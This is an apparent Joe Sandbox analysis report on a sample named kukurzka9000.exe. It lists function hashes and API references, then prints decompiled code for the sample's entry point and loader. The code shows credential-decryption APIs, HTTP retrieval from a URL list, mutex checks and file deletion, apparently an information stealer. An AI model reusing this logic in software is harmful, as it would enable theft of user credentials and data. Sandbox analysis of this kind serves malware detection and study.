Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 11e6684635529dbad8d35b36eef148a8965c2c1dbfdad4b443329b555f114060
Instruction ID: f0591ccac9ef110b670dbafa2154f0458bff898d973b6b25682ed3c2d09e6541
Opcode Fuzzy Hash: 11e6684635529dbad8d35b36eef148a8965c2c1dbfdad4b443329b555f114060
Instruction Fuzzy Hash: 1B4125B0E102299FDB24CF48C841BAEB7B5FF89314F1051AAD149AB251C7389E85CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 004312B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 004312E0
__aullrem.LIBCMT ref: 004314B0
__aulldiv.LIBCMT ref: 004314D2

Strings

9, xrefs: 004314E3

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 6e911fc6991dbc0dd141f8c46212a9eaaa5899a69abeb8a2316d7e632b1c436b
Instruction ID: 5b1078cb3ae15d9e769b38bd35f864cbac34573bdd3023a4d8c32d9638b75aed
Opcode Fuzzy Hash: 6e911fc6991dbc0dd141f8c46212a9eaaa5899a69abeb8a2316d7e632b1c436b
Instruction Fuzzy Hash: D44116B1E1012A9FEF24CF48C981BAEB7B5FF89314F1051AAD149AB251C7385E85CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0042FF3C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042FF68
__aullrem.LIBCMT ref: 00430135
__aulldiv.LIBCMT ref: 00430157

Strings

9, xrefs: 00430168

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 6b6ddc622a056617a5856230ff7480f80a991bdd0847e8647f113bc0b4bb191c
Instruction ID: 835cfe15b476ae8e4793af6b9a4f30a0ff4c6f9aecd7600ab4d96fd8f35f6e68
Opcode Fuzzy Hash: 6b6ddc622a056617a5856230ff7480f80a991bdd0847e8647f113bc0b4bb191c
Instruction Fuzzy Hash: C441E671D01229DFDB64CF48DCA9BAEB7B5FB48300F1086AAD008A7240C7395E84CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0043125D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 004312E0
_get_int64_arg.LIBCMTD ref: 00431308
__aullrem.LIBCMT ref: 004314B0
__aulldiv.LIBCMT ref: 004314D2

Strings

9, xrefs: 004314E3

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: 1e2721535cc656cbde0337daf3e84c73702726f3bb7acc712b66a0e9bb19ac73
Instruction ID: 4f6c0f0e4c96b38d0cba1ee8cb67c5684d1908fa339e2039248adde2d440ae71
Opcode Fuzzy Hash: 1e2721535cc656cbde0337daf3e84c73702726f3bb7acc712b66a0e9bb19ac73
Instruction Fuzzy Hash: 864106B1E001299FDB24CF48C981BAEB7B5FF89314F1051EAE149AB251C7385E81CF1A

Uniqueness

Uniqueness Score: -1.00%

Function 0042FEEB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042FF68
_get_int64_arg.LIBCMTD ref: 0042FF90
__aullrem.LIBCMT ref: 00430135
__aulldiv.LIBCMT ref: 00430157

Strings

9, xrefs: 00430168

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: 8050f4bc507ec0bb941bc43ca6d5d4e1f6f56b66609b99a9966d1b80a37584e8
Instruction ID: 6a8d78a9addc34f3ad7b00732ff531346a2d7fbc9811f2eeef7983ee3703c0e6
Opcode Fuzzy Hash: 8050f4bc507ec0bb941bc43ca6d5d4e1f6f56b66609b99a9966d1b80a37584e8
Instruction Fuzzy Hash: 7041E671E06228DFDB64CF58D8A9BAEB7B5FB48300F20969AD008A7240C7395E84CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0041AE98 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMTD ref: 0041AEAD

Part of subcall function 0041BCB0: __getptd_noexit.LIBCMTD ref: 0041BCB6
Part of subcall function 0041BCB0: __amsg_exit.LIBCMTD ref: 0041BCC6

__getptd.LIBCMTD ref: 0041AEBB
___DestructExceptionObject.LIBCMTD ref: 0041AF28

Strings

csm, xrefs: 0041AECC

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __getptd$DestructExceptionObject__amsg_exit__getptd_noexit
String ID: csm
API String ID: 4182212180-1018135373
Opcode ID: 0c34df0d760dd2be17682900818bc7e984008826c765d5e1224b71bd8f6bbe05
Instruction ID: 3e0ef99184adc83b36a3de020c612cd6e5a1dcf5289a61a20a03a7259e04c887
Opcode Fuzzy Hash: 0c34df0d760dd2be17682900818bc7e984008826c765d5e1224b71bd8f6bbe05
Instruction Fuzzy Hash: 161158B49122089BCF04DF51D1409EB7B72BF44359F90806AE8084B301D739EED2CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 0042B634 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

__errno.LIBCMTD ref: 0042B65A
__errno.LIBCMTD ref: 0042B650

Part of subcall function 00419D50: __getptd_noexit.LIBCMTD ref: 00419D56

_memset.LIBCMT ref: 0042B6C3
__errno.LIBCMTD ref: 0042B718

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __errno$__getptd_noexit_memset
String ID:
API String ID: 2566647553-0
Opcode ID: 1b48cd490129e75590af3b027f3b6103edbc69c545417cd468af48ab97c2e8e5
Instruction ID: d37dbc28f95ddef8e69025ae021ec1e05b2bb3543eccda486b0baf71b08d6c61
Opcode Fuzzy Hash: 1b48cd490129e75590af3b027f3b6103edbc69c545417cd468af48ab97c2e8e5
Instruction Fuzzy Hash: D6318430A00219EADF20DF54E9457AE7770EF51339F64826BE4292A3E1D3794D81CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00420412 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

__whiteout.LIBCMTD ref: 0042059F
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004215A6

Strings

n, xrefs: 004205CA

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: Locale$UpdateUpdate::~___whiteout
String ID: n
API String ID: 2661511698-2013832146
Opcode ID: a33af23d6a0fab86e66f612ac922636c844993ceb07215517b78c2e6999f35a1
Instruction ID: 0ed35de28cb5c4300c01912a322ac160f30ea6637afc2d79283bb38ba67d480f
Opcode Fuzzy Hash: a33af23d6a0fab86e66f612ac922636c844993ceb07215517b78c2e6999f35a1
Instruction Fuzzy Hash: 0641BF70A01269DBCF24CF55E4947EEBBF0AF41315F5481DBE8566A292C2388EC1CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004203E7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

__whiteout.LIBCMTD ref: 0042059F
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004215A6

Strings

n, xrefs: 004205CA

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: Locale$UpdateUpdate::~___whiteout
String ID: n
API String ID: 2661511698-2013832146
Opcode ID: 5f2175965e7bc0c0ed41a6cc2b9d15174e87f48c80463089164edb535b038560
Instruction ID: 0ed35de28cb5c4300c01912a322ac160f30ea6637afc2d79283bb38ba67d480f
Opcode Fuzzy Hash: 5f2175965e7bc0c0ed41a6cc2b9d15174e87f48c80463089164edb535b038560
Instruction Fuzzy Hash: 0641BF70A01269DBCF24CF55E4947EEBBF0AF41315F5481DBE8566A292C2388EC1CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004204D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

__whiteout.LIBCMTD ref: 0042059F
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004215A6

Strings

n, xrefs: 004205CA

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: Locale$UpdateUpdate::~___whiteout
String ID: n
API String ID: 2661511698-2013832146
Opcode ID: bfd66062e8e27a280552f7e2b3ad207d37083d325a47f0f773fbd0b790f8c2e7
Instruction ID: d47c12be78318011e057a18be39ad1a7240684078ae5c7abe8e65317bfe61cd6
Opcode Fuzzy Hash: bfd66062e8e27a280552f7e2b3ad207d37083d325a47f0f773fbd0b790f8c2e7
Instruction Fuzzy Hash: AE319170A01268EBCF24CF55E4947EEBBF0AF11315F5041DBE85666252C2388EC1CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00420B4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_isxdigit.LIBCMTD ref: 00420BBD
__hextodec.LIBCMTD ref: 00420BF0
_isdigit.LIBCMTD ref: 00420C16
__inc.LIBCMTD ref: 00420D00
__un_inc.LIBCMTD ref: 00420D24
_isxdigit.LIBCMTD ref: 00420D7D
__hextodec.LIBCMTD ref: 00420DA0
_isdigit.LIBCMTD ref: 00420DC3
__inc.LIBCMTD ref: 00420E74
__un_inc.LIBCMTD ref: 00420E98
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004215A6

Strings

p, xrefs: 00420BAF

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: Locale__hextodec__inc__un_inc_isdigit_isxdigit$UpdateUpdate::~_
String ID: p
API String ID: 1652772854-2181537457
Opcode ID: 7e471efdfc92bb58afa428daf1570721bc5bde3b08cbc77e8dd7330fa0d0a624
Instruction ID: ab9035c48991bbb2de8ccdc8194c1671506a212b0df9223f12cb3ba8c7c441a8
Opcode Fuzzy Hash: 7e471efdfc92bb58afa428daf1570721bc5bde3b08cbc77e8dd7330fa0d0a624
Instruction Fuzzy Hash: 272145B4E052798ACB29CF65E8543EEBBF1AB45304F5441DBC41966203D2385A81DF49

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: kukurzka9000.exePID: 5984, Parent PID: 6016COMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	70.4%
Signature Coverage:	0%
Total number of Nodes:	1551
Total number of Limit Nodes:	2

Executed Functions

Function 0040100B Relevance: 217.5, APIs: 15, Strings: 109, Instructions: 531
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(kernel32.dll,?,?,00407780), ref: 00401016
GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 00401036
LoadLibraryW.KERNELBASE(WinInet.dll,?,?,?,?,?,00407780), ref: 00401061
LoadLibraryW.KERNELBASE(Crypt32.dll,?,?,?,?,?,00407780), ref: 00401091
LoadLibraryW.KERNELBASE(Bcrypt.dll,?,?,?,?,?,00407780), ref: 004010AA
GetProcAddress.KERNEL32(?,GetProcAddress), ref: 004010B8
GetProcAddress.KERNEL32(?,HeapFree), ref: 00401297
GetProcAddress.KERNEL32(?,Sleep), ref: 00401369
GetProcAddress.KERNEL32(00000000,StrToIntA), ref: 004014CB
GetProcAddress.KERNEL32(00000000,StrToInt64ExW), ref: 004014E9
GetProcAddress.KERNEL32(?,CharUpperW), ref: 004015C1
GetProcAddress.KERNEL32(?,InternetOpenUrlA), ref: 004016F6
GetProcAddress.KERNEL32(?,InternetReadFileExW), ref: 00401714
GetProcAddress.KERNEL32(?,HttpQueryInfoA), ref: 00401768
GetProcAddress.KERNEL32(?,HttpQueryInfoW), ref: 00401774

Strings

WideCharToMultiByte, xrefs: 004013FA
RegQueryValueExW, xrefs: 0040158F
GetEnvironmentVariableW, xrefs: 004010CA
GetLogicalDriveStringsW, xrefs: 00401124
RegEnumKeyExW, xrefs: 0040156B
ReleaseDC, xrefs: 0040161C
ShellExecuteW, xrefs: 0040140C
Advapi32.dll, xrefs: 00401069
InternetReadFileExW, xrefs: 00401709
GlobalMemoryStatusEx, xrefs: 004011C6
InternetOpenUrlW, xrefs: 00401701
CharUpperW, xrefs: 004015B6
Process32First, xrefs: 00401316
GetTimeZoneInformation, xrefs: 00401190
lstrcmpW, xrefs: 004013B2
OpenProcess, xrefs: 004012BC
CloseHandle, xrefs: 004011D8
lstrlenW, xrefs: 004013D6
HttpQueryInfoA, xrefs: 0040175D
StrToIntW, xrefs: 004014D6
SetCurrentDirectoryW, xrefs: 0040133A
wsprintfW, xrefs: 0040162E
GetSystemInfo, xrefs: 00401152
CoInitialize, xrefs: 00401643
InternetOpenW, xrefs: 004016C7
PathCombineW, xrefs: 00401454
RegOpenKeyExW, xrefs: 0040157D
PathMatchSpecW, xrefs: 00401442
StrCpyW, xrefs: 00401478
MultiByteToWideChar, xrefs: 004012F2
WriteFile, xrefs: 004013E8
LocalAlloc, xrefs: 004012E0
CreateFileW, xrefs: 004011EA
OpenProcessToken, xrefs: 00401547
CoCreateInstance, xrefs: 00401655
InternetSetOptionW, xrefs: 004016D9
DeleteFileW, xrefs: 00401220
SystemFunction036, xrefs: 004015A1
InternetConnectW, xrefs: 004016B5
GetTokenInformation, xrefs: 00401523
WinInet.dll, xrefs: 00401059
Process32Next, xrefs: 00401328
CreateToolhelp32Snapshot, xrefs: 0040127A
FreeLibrary, xrefs: 00401232
SHGetFolderPathW, xrefs: 0040141E
lstrlenA, xrefs: 004013C4
Shell32.dll, xrefs: 00401099
Bcrypt.dll, xrefs: 004010A3
HeapFree, xrefs: 0040128C
OpenMutexW, xrefs: 004012AA
GetModuleFileNameW, xrefs: 00401136
DuplicateTokenEx, xrefs: 00401511
Shlwapi.dll, xrefs: 00401038
InternetOpenUrlA, xrefs: 004016EB
Crypt32.dll, xrefs: 00401089
ReadFile, xrefs: 00401304
StrStrA, xrefs: 0040148A
GetDesktopWindow, xrefs: 004015F8
User32.dll, xrefs: 00401079
SHGetSpecialFolderPathW, xrefs: 00401430
GetClientRect, xrefs: 004015DE
CreateMutexW, xrefs: 004011FC
FindFirstFileW, xrefs: 00401256
FindClose, xrefs: 00401244
StrToInt64ExW, xrefs: 004014DE
ExitProcess, xrefs: 004012A2
GlobalFree, xrefs: 004011B4
HttpSendRequestW, xrefs: 0040174B
kernel32.dll, xrefs: 00401011
GetSystemMetrics, xrefs: 0040160A
lstrcpynA, xrefs: 0040137C
StrStrIW, xrefs: 004014B8
InternetCloseHandle, xrefs: 00401727
CryptStringToBinaryW, xrefs: 0040167C
Sleep, xrefs: 0040135E
ConvertSidToStringSidW, xrefs: 004014F7
CryptUnprotectData, xrefs: 004016A0
GetFileSize, xrefs: 004010DC
FindNextFileW, xrefs: 00401272
GetLocaleInfoW, xrefs: 00401112
StrToIntA, xrefs: 004014C0
HttpOpenRequestW, xrefs: 00401739
GlobalAlloc, xrefs: 004011A2
EnumDisplayDevicesW, xrefs: 004015CC
SetEnvironmentVariableW, xrefs: 0040134C
GetCurrentProcess, xrefs: 004010BD
CopyFileW, xrefs: 0040120E
CryptBinaryToStringW, xrefs: 0040168E
lstrcmpA, xrefs: 004013A0
GetDC, xrefs: 004015E6
GetUserNameW, xrefs: 00401535
CreateProcessWithTokenW, xrefs: 004014FF
GetProcAddress, xrefs: 004010B0
GetDriveTypeW, xrefs: 004010EE
Ole32.dll, xrefs: 0040104C
GetSystemWow64DirectoryW, xrefs: 0040115A
lstrcpyA, xrefs: 00401374
LoadLibraryW, xrefs: 00401030
StrStrW, xrefs: 0040149C
RegCloseKey, xrefs: 00401559
GetLastError, xrefs: 00401100
GetUserDefaultLCID, xrefs: 0040116C
HttpQueryInfoW, xrefs: 0040176E
StrRChrW, xrefs: 00401466
LocalFree, xrefs: 004012CE
CryptStringToBinaryA, xrefs: 0040166A
lstrcmpiW, xrefs: 00401398
GetUserDefaultLocaleName, xrefs: 0040117E
InternetReadFile, xrefs: 0040171F

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: Advapi32.dll$Bcrypt.dll$CharUpperW$CloseHandle$CoCreateInstance$CoInitialize$ConvertSidToStringSidW$CopyFileW$CreateFileW$CreateMutexW$CreateProcessWithTokenW$CreateToolhelp32Snapshot$Crypt32.dll$CryptBinaryToStringW$CryptStringToBinaryA$CryptStringToBinaryW$CryptUnprotectData$DeleteFileW$DuplicateTokenEx$EnumDisplayDevicesW$ExitProcess$FindClose$FindFirstFileW$FindNextFileW$FreeLibrary$GetClientRect$GetCurrentProcess$GetDC$GetDesktopWindow$GetDriveTypeW$GetEnvironmentVariableW$GetFileSize$GetLastError$GetLocaleInfoW$GetLogicalDriveStringsW$GetModuleFileNameW$GetProcAddress$GetSystemInfo$GetSystemMetrics$GetSystemWow64DirectoryW$GetTimeZoneInformation$GetTokenInformation$GetUserDefaultLCID$GetUserDefaultLocaleName$GetUserNameW$GlobalAlloc$GlobalFree$GlobalMemoryStatusEx$HeapFree$HttpOpenRequestW$HttpQueryInfoA$HttpQueryInfoW$HttpSendRequestW$InternetCloseHandle$InternetConnectW$InternetOpenUrlA$InternetOpenUrlW$InternetOpenW$InternetReadFile$InternetReadFileExW$InternetSetOptionW$LoadLibraryW$LocalAlloc$LocalFree$MultiByteToWideChar$Ole32.dll$OpenMutexW$OpenProcess$OpenProcessToken$PathCombineW$PathMatchSpecW$Process32First$Process32Next$ReadFile$RegCloseKey$RegEnumKeyExW$RegOpenKeyExW$RegQueryValueExW$ReleaseDC$SHGetFolderPathW$SHGetSpecialFolderPathW$SetCurrentDirectoryW$SetEnvironmentVariableW$Shell32.dll$ShellExecuteW$Shlwapi.dll$Sleep$StrCpyW$StrRChrW$StrStrA$StrStrIW$StrStrW$StrToInt64ExW$StrToIntA$StrToIntW$SystemFunction036$User32.dll$WideCharToMultiByte$WinInet.dll$WriteFile$kernel32.dll$lstrcmpA$lstrcmpW$lstrcmpiW$lstrcpyA$lstrcpynA$lstrlenA$lstrlenW$wsprintfW
API String ID: 2238633743-713005165
Opcode ID: e028293d92a6d1446fa316ab8758502f4985f86e5f7caba5ca57395c6088599a
Instruction ID: 478e95b91b71f65d022eb20dd3102177344006f4c0d5f92c9651a9cba786d8dc
Opcode Fuzzy Hash: e028293d92a6d1446fa316ab8758502f4985f86e5f7caba5ca57395c6088599a
Instruction Fuzzy Hash: 99125671645220EFD340DFBAEFC1E6937E8AB497003105D36B624F72A1D7B899218B5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040776F Relevance: 68.6, APIs: 32, Strings: 7, Instructions: 395
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			_entry_() {
				WCHAR* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				char _v32;
				struct HINSTANCE__* _v36;
				struct _SECURITY_ATTRIBUTES* _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v236;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t74;
				char _t77;
				char _t78;
				WCHAR* _t79;
				void* _t80;
				void* _t81;
				void* _t83;
				void* _t85;
				void* _t87;
				signed int _t95;
				void* _t99;
				void* _t100;
				void* _t113;
				void* _t117;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				struct _SECURITY_ATTRIBUTES* _t140;
				struct HINSTANCE__* _t156;
				struct HINSTANCE__* _t159;
				void* _t166;
				void* _t181;
				void* _t182;
				char* _t184;
				intOrPtr _t236;
				intOrPtr _t238;
				intOrPtr _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				intOrPtr _t246;
				intOrPtr _t247;
				void* _t258;
				void* _t259;
				WCHAR* _t260;
				void* _t263;
				void* _t264;
				signed int _t265;
				void* _t268;
				struct HINSTANCE__* _t269;
				void* _t271;
				void* _t272;
				void* _t273;
				intOrPtr* _t276;
				void* _t277;
				intOrPtr* _t278;

				E0040100B(); // executed
				 *0x40e064(0);
				_v24 = E0040A4C2("afb5c633c4650f69312baef49db9dfa4");
				E00404027();
				_t184 =  *0x40e04c;
				_push(0x55);
				_push( &_v236);
				if( *_t184() == 0) {
					L4:
					_t260 = L"iqroq5112542785672901323";
					_push(_t260);
					_push(0);
					_push(0x1f0001);
					if( *((intOrPtr*)( *0x40e168))() != 0) {
						ExitProcess(2); // executed
					}
					CreateMutexW(0, 0, _t260);
					if(E0040A0BE() != 0) {
						E0040A1FE();
					}
					_t72 = E00409FD3(0x40d998);
					_t73 = E00409FD3("                                                                ");
					_t74 = E00409FD3("                                                                ");
					_v64 = _t72;
					_v60 = _t73;
					_v56 = _t74;
					_v52 = E00409FD3("                                                                ");
					_v48 = E00409FD3("                                                                ");
					_t77 =  *0x40e314; // 0x6aea80
					_v32 = _t77;
					_t78 =  *0x40e204; // 0x6e78d8
					_v28 = 0;
					_v44 = _t78;
					_v40 = 0;
					_t79 = E00408619( &_v32);
					 *_t278 = 0x1000;
					_v8 = _t79;
					_t80 =  *((intOrPtr*)( *0x40e044))(0x40, _t184);
					_v20 = _t80;
					_t81 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
					_t258 = E0040A5FA();
					_t83 = E0040A672( *0x40e044);
					_t181 = _t83;
					_t85 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t81,  *0x40e348), _t258);
					_t236 =  *0x40e20c; // 0x6e79d8
					_t87 = E0040A503(E0040A503(_t85, _t236), _t181);
					_t238 =  *0x40e308; // 0x6d64c0
					_t263 = E0040A503(E0040A503(_t87, _t238), _v24);
					_v16 =  *((intOrPtr*)( *0x40e13c))(_v20, _t263);
					LocalFree(_t258);
					LocalFree(_t181);
					LocalFree(_t263);
					_t182 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
					_t95 = 0;
					_v12 = 0;
					while(1) {
						_t264 = E0040A4C2( *((intOrPtr*)(_t277 + _t95 * 4 - 0x3c)));
						_push(_t264);
						if( *((short*)(_t264 +  *((intOrPtr*)( *0x40e08c))() * 2 - 2)) != 0x2f) {
							_t264 = E0040A503(_t264, "/");
						}
						_t99 = E00407C62(_t264, _v16, _v8,  &_v44);
						_t278 = _t278 + 0xc;
						_t259 = _t99;
						_t100 =  *((intOrPtr*)( *0x40e08c))(_t259);
						_push(_t264);
						if(_t100 >= 0x40) {
							break;
						}
						LocalFree();
						if(_t259 == 0) {
							LocalFree(_t259);
						}
						_t95 = _v12 + 1;
						_v12 = _t95;
						if(_t95 < 5) {
							continue;
						} else {
							L18:
							LocalFree(_v8);
							LocalFree(_v16);
							_v8 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
							E0040A24A( &_v8);
							if(_t259 == 0) {
								L38:
								LocalFree(_v8);
								LocalFree(_t182);
								ExitProcess(0);
							}
							E0040864C(_t259, _v8);
							_t265 = 0;
							_t113 =  *((intOrPtr*)( *0x40e18c))(_t259,  *0x40e418);
							if(_t113 == 0) {
								L21:
								ExitProcess(0xffffffff);
							}
							_t265 = _t113 - _t259 >> 1;
							_v12 =  *((intOrPtr*)( *0x40e044))(0x40, 0x100);
							_t117 =  *((intOrPtr*)( *0x40e08c))(_t259);
							_t37 = _t265 + 6; // 0x6
							if(E0040A3E4(_t259,  &_v12, _t37, _t117) != 0) {
								_t182 = E0040A503(_t182, _v12);
								LocalFree(_v12);
								_t123 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t124 =  *((intOrPtr*)( *0x40e13c))(_t123, _v8);
								_t243 =  *0x40e258; // 0x6e7a78
								_t125 = E0040A503(_t124, _t243);
								_t244 =  *0x40e370; // 0x6be388
								_t126 = E0040A503(_t125, _t244);
								_v20 = _t126;
								_t127 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t128 =  *((intOrPtr*)( *0x40e13c))(_t127, _v8);
								_t245 =  *0x40e258; // 0x6e7a78
								_t129 = E0040A503(_t128, _t245);
								_t246 =  *0x40e454; // 0x6d66d0
								_v24 = E0040A503(_t129, _t246);
								SetCurrentDirectoryW(_v8);
								GetEnvironmentVariableW( *0x40e2e0,  *((intOrPtr*)( *0x40e044))(0x40, 0x5000), 0x2800);
								_t247 =  *0x40e1e8; // 0x6e7898
								_t220 = E0040A503(_t132, _t247);
								_t268 = E0040A503(_t134, _v8);
								SetEnvironmentVariableW( *0x40e2e0, _t268);
								LocalFree(_t268);
								E00409906(_t259, _t182);
								_t140 =  *((intOrPtr*)( *0x40e034))(_v24);
								_v28 = _t140;
								if(_t140 != 0) {
									E00403F9D(_t220, _t140, _t259, _t182);
								}
								_t269 =  *((intOrPtr*)( *0x40e034))(_v20);
								_v36 = _t269;
								if(_t269 != 0) {
									_t166 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
									_v16 = _t166;
									 *0x40e0c4(0, _t166, 0x1a, 0);
									if(E004065D8(_t269) == 0) {
										_t273 = _v16;
									} else {
										_t273 = _v16;
										E0040633E(_t273, _t182, _t269, 0);
									}
									LocalFree(_t273);
								}
								E0040A7DA(_t182);
								E0040ABD8(_t259, _t182);
								E004055B6(_t182);
								E00409BD9(_t259, _t182);
								E00404F7E(_t259, _t182);
								_v12 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t259) + _t149);
								if(E00408A42(_t259,  &_v12) > 0) {
									E00408ADD(_v12, _t182);
								}
								LocalFree(_v12);
								E004073C7();
								_t156 = _v36;
								if(_t156 != 0) {
									FreeLibrary(_t156);
								}
								_t271 = _v20;
								DeleteFileW(_t271);
								LocalFree(_t271);
								_t159 = _v28;
								if(_t159 != 0) {
									FreeLibrary(_t159);
								}
								_t272 = _v24;
								DeleteFileW(_t272);
								LocalFree(_t272);
								LocalFree(_t259);
								goto L38;
							} else {
								ExitProcess(0xfffffffe);
							}
							goto L21;
						}
					}
					_t182 =  *((intOrPtr*)( *0x40e13c))(_t182);
					LocalFree(_t264);
					goto L18;
				}
				_t276 = 0x40e4d8;
				while(1) {
					_push( *_t276);
					_t184 =  &_v236;
					_push(_t184);
					if( *((intOrPtr*)( *0x40e170))() != 0) {
						goto L4;
					}
					_t276 = _t276 + 4;
					if(_t276 != 0x40e4dc) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x0040777b
0x00407783
0x00407793
0x00407796
0x0040779b
0x004077a7
0x004077a9
0x004077ae
0x004077d4
0x004077d9
0x004077de
0x004077df
0x004077e0
0x004077e9
0x004077f8
0x004077f8
0x004077ee
0x00407805
0x00407807
0x00407807
0x00407812
0x0040781e
0x0040782a
0x00407834
0x00407837
0x0040783a
0x00407847
0x0040784f
0x00407855
0x0040785a
0x0040785d
0x00407862
0x00407865
0x00407868
0x0040786b
0x00407876
0x0040787f
0x00407882
0x00407891
0x00407894
0x0040789d
0x0040789f
0x004078b0
0x004078b9
0x004078be
0x004078cf
0x004078d4
0x004078f1
0x004078fa
0x004078fd
0x00407904
0x0040790b
0x00407920
0x00407922
0x00407924
0x00407927
